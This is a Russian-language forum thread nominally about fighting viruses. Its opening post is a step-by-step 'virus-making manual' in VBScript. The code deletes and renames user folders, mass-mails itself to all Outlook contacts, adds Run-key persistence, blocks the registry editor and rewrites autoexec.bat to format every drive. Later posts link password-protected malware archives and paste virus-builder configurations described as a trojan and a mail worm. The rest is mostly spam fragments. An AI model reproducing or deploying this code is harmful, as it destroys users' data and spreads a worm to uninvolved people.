Сделать стартовой

Всё для администраторов

Объявление

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Всё для администраторов » Вирусы » Вирусы и как с ними бороться..>>


Вирусы и как с ними бороться..>>

Сообщений 1 страница 30 из 683

1

Вот вам пример...~Мануал по созданию вируса~ на VBS! (' - указанные ниже абзацы не прописывать)
-------------------------------------------------------------
Ну начнем.......
Открываем простой блокнот (при помощи блокнота можно создать почти что угодно)......И прописываем основное начало нашего вируса:

CODE' абзац
Set f = CreateObject("scripting.filesystemobject")
Set s = CreateObject("Wscript.Shell")
t=0: on error resume next
Set os = CreateObject("Shell.Application")
set ie = WScript.CreateObject("InternetExplorer.Application")
Set oe = WScript.CreateObject("Outlook.Application")

Так начинку сделали....
Теперь я пропишу ВАМ основные действия вируса:..... 

1) Сделаем так чтобы после открытия нашего проекта у юзвера выскочило сообщение: 
CODE'     Вывести сообщение
s.popup "text1", , "text2", 0+16

text1 - само сообщение
text2 - заголовок сообщения

0+x - тип сообщения
(0+0) - обычный тип
(0+16) - ошибка
(0+64) - информация
(0+48) - восклицание
(0+32) - вопрос

2) Нам нужно что-то переименовать....
CODE' Переименование всех файлов, находящихся на Робочем столе на "text"
For Each Folder In s.SpecialFolders
if right(folder,12)="Рабочий стол" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="text" & t
next
end if
next

text - новый текст!
-------------------------------------

' Переименование папки Мои документы на "Новое_Название"
For Each Folder In s.SpecialFolders
if right(folder,13)="Мои документы" then
set tf=f.getfolder(folder): tf.name="Новое_Название"
End if
next
------------------------------------

' Переименование всех файлов, находящихся в Моих документах на "Новое_название"
For Each Folder In s.SpecialFolders
if right(folder,13)="Мои документы" then
set tf=f.getfolder(folder)
set af=tf.files
For Each fl In af
set file=f.getfile(fl):t=t+1
file.name="НАЗВАНИЕ" & t
next
end if
next
------------------------------------

' Переименование всех файлов, находящихся в Главное меню\Программы на "новое_название"
For Each Folder In s.SpecialFolders
if right(folder,12)="Главное меню" then
set tf=f.getfolder(folder)
set af=tf.subfolders
For Each fl In af
set file=f.getfolder(fl):t=t+1
file.name="новое_название" & t
next
end if
next

3) Нам нужно что-то переместить:

CODE' Перемещение Рабочего стола в "FOLDER"
For Each Folder In s.SpecialFolders
if right(folder,12)="Рабочий стол" then
f.copyfolder folder, "FOLDER"
f.deletefolder folder, true
next

(folder - папка)
--------------------------------------

' Перемещение папки Мои документы в "папка"
For Each Folder In s.SpecialFolders
if right(folder,13)="Мои документы" then
f.copyfolder folder, "папка"
f.deletefolder folder, true
next

4) ......Интернет 
CODE
' Сделать домашней страницу "http:\\hack-all.net"
s.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http:\\hack-all.net"
----------------------------------------

' Перейти на сайт "http:\\hack-all.net"
ie.Visible = True
ie.Navigate "http:\\hack-all.net"
----------------------------------------

' Разослать вирус Всем контактам неприятеля
For Index = 1 To oe.GetNameSpace("MAPI").AddressLists(1).count
Set OutMail = oe.CreateItem(0)
OutMail.to = oe.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "в теме письма"
OutMail.Body = "в теле письма"
OutMail.Attachments.Add WScript.ScriptFullName
OutMail.Send
Next

5) Удаляем нужные объекты....
CODE'     Удаление специальных папок
For Each Folder In s.SpecialFolders
-------------------------------------------------

' Удаление Рабочего стола
f.deletefolder s.SpecialFolders ("Desktop"),true
-------------------------------------------------

' Удаление Aplication Data
if right(folder,15)="Aplication Data" then f.deletefolder folder,true
-------------------------------------------------

' Удаление PrintHood
if  right(folder,9)="PrintHood"  then f.deletefolder folder,true
-------------------------------------------------

' Удаление ShellNew
if right(folder,8)="ShellNew" then f.deletefolder folder,true
-------------------------------------------------

' Удаление шрифтов
if right(folder,5)="FONTS" then f.deletefolder folder,true
-------------------------------------------------

' Удаление NetHood
if right(folder,7)="NetHood" then f.deletefolder folder,true
-------------------------------------------------

' Удаление Главное меню
if right(folder,12)="Главное меню" then f.deletefolder folder,true
-------------------------------------------------

' Удаление SendTo
if right(folder,6)="SendTo" then f.deletefolder folder,true
-------------------------------------------------

' Удаление Recent
if right(folder,6)="Recent" then f.deletefolder folder,true
-------------------------------------------------

' Удаление Автозагрузка
if right(folder,12)="Автозагрузка" then f.deletefolder folder,true
-------------------------------------------------

' Удаление Избранное
if right(folder,9)="Избранное" then f.deletefolder folder,true
-------------------------------------------------

' Удаление Мои документы
if right(folder,13)="Мои документы" then f.deletefolder folder,true
-------------------------------------------------

' Удаление Программы
if right(folder,9)="Программы" then f.deletefolder folder,true
Next

6) Очень вредоносное....... (делать не советую)
CODE'     Поменять функции клавиш мышки местами
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton"
s.Run "rundll32 user32, SwapMouseButton"
-------------------------------------------------

'     Вырубить клавиатуру(Только для Windows 95,98,Me)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
s.Run "rundll32.exe keyboard.exe, disable"
-------------------------------------------------

'     Отключить мышь(Только для Windows 95,98,Me)
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
s.Run "rundll32.exe mouse.exe, disable"
-------------------------------------------------

' Минимизировать все окна
os.MinimizeAll
-------------------------------------------------

' Запускаться при каждой перезагрузке
Set File2 = f.GetFile(WScript.ScriptFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
s.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
-------------------------------------------------

' Блокировать RegEdit(чтоб у него не заводился редактор реестра).Для того чтобы разблокировать происвойте DisableRegistryTools значение - 0
s.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"
-------------------------------------------------

'      Форматировать Все диски (Только для Windows 95,98,Me)
If f.FileExists("d:\autoexec.bat") Then Str ="d:\autoexec.bat"
If f.FileExists("d:\Windows.000\autoexec.bat") Then Str ="d:\Windows.000\autoexec.bat"
If f.FileExists("d:\Windows\autoexec.bat") Then Str ="d:\Windows\autoexec.bat"
If f.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If f.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If f.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = f.GetFile(Str)
ab.Attributes = 0
Set autoexec = f.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
s.Run Str, 5
-------------------------------------------------

'     Перезагрузить компьютер(Только для Windows 95,98,Me)
s.Run "Rundll32.exe User.exe,ExitWindows"
-------------------------------------------------

'     Самоликвидироваться
f.deletefile WScript.ScriptFullName, true

0

2

Пожалуйста ..выкладывайте здесь свои вири ...будем их розбирать и искать противоядие..)))

0

3

Это чернобыльский: http://kto32.narod.ru/Files/CHI95.RAR
Это АнтиAVP: http://kto32.narod.ru/Files/AntiAVP.rar 
Пароль к архивам: 123

0

4

Скрипт Апокалипсис 2.0...

1|*0|*1|*1|*1|*0|*0|*0|*0|*1|*1|*1|*0|*0|*1|*0|*0|*0|*1|*1|*0|*1|*0|*1|*0|*1|*1|*1|*Невозможно открыть программу из-за отсутствия файла Fuck.dll^%Ошибка приложения Net_fuck^%Правельный_Пароль^%ТВОЁ ДЕРЬМО^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Моё Говно^%Дерьмо!!!^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%http:\\^%http:\\www.nashalife.ru^%Text29^%КРУТО!^%Смотри какую я прогу в сети нашел! Она для бесплатного доступа в интернет! Круто?^%Путь_к_файлу^%D:\Distr^%C:\Games^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Новое_значение^%Новое_значение^%Новое_значение^%Новое_значение^%Ошибка&~5 сек.&~Все контакты&~$}$}

0

5

1|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*0|*1|*0|*0|*0|*Если ты не я, тогда слезь с моего кресла и не шарься в моем компе!^%КРИТИН !^%Правельный_Пароль^%Новое_Название^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%http:\\^%http:\\^%Text29^%Новое_Название^%Новое_Название^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Новое_значение^%Новое_значение^%Новое_значение^%Новое_значение^%Восклицание&~10 сек.&~Все контакты&~$}
'**********************************
' Этот пример показывает как можно сделать
' торояна. Здесь представлено только его
' основа, а остальные функции задать будет
' делом техники.
'**********************************$}

0

6

1|*0|*0|*0|*0|*0|*0|*0|*0|*0|*1|*1|*1|*1|*1|*1|*1|*1|*1|*1|*1|*1|*1|*1|*0|*1|*0|*0|*Зря ты это сделал!^%Ха-ха-ха!^%Правельный_Пороль^%Новое_Название^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Новое_Название^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Новый_путь_к_файлу^%Новый_путь_к_файлу^%http:\\^%http:\\^%http:\\^%Привет!^%Лови мою фотку!^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_файлу^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_удаляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Путь_к_добавляемой_информации^%Новое_значение^%Новое_значение^%Новое_значение^%Новое_значение^%Ошибка&~1 сек.&~Все контакты&~$}
' ********************************
' Этот пример показывает, как можно написать
' почтового червя. Он разошлет сам себя по
' всему миру. Его можно напичкать любыми
' функциями из нашей программы.
' ********************************$}

0

7

если вирус записался его невозможно удалить...разве что вместе с зараженным файлом..воть..))вирусы очень часто записываются как обновление системы ..я никогда не обнавляю систему....и не принимайте файлы особенно через асю..хитрожопых слишком много...)))

0

8

9

инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинйоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
инфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфоинфо
tuchkasинфоинфо

0

10

Audi

0

11

21.6

0

12

Bett

0

13

Bett

0

14

Thic

0

15

Kjel

0

16

Mode

0

17

Patr

0

18

Will

0

19

seco

0

20

John

0

21

Enns

0

22

Dori

0

23

Dorm

0

24

Jewe

0

25

Star

0

26

King

0

27

Crys

0

28

Crys

0

29

Clar

0

30

Nigh

0


Вы здесь » Всё для администраторов » Вирусы » Вирусы и как с ними бороться..>>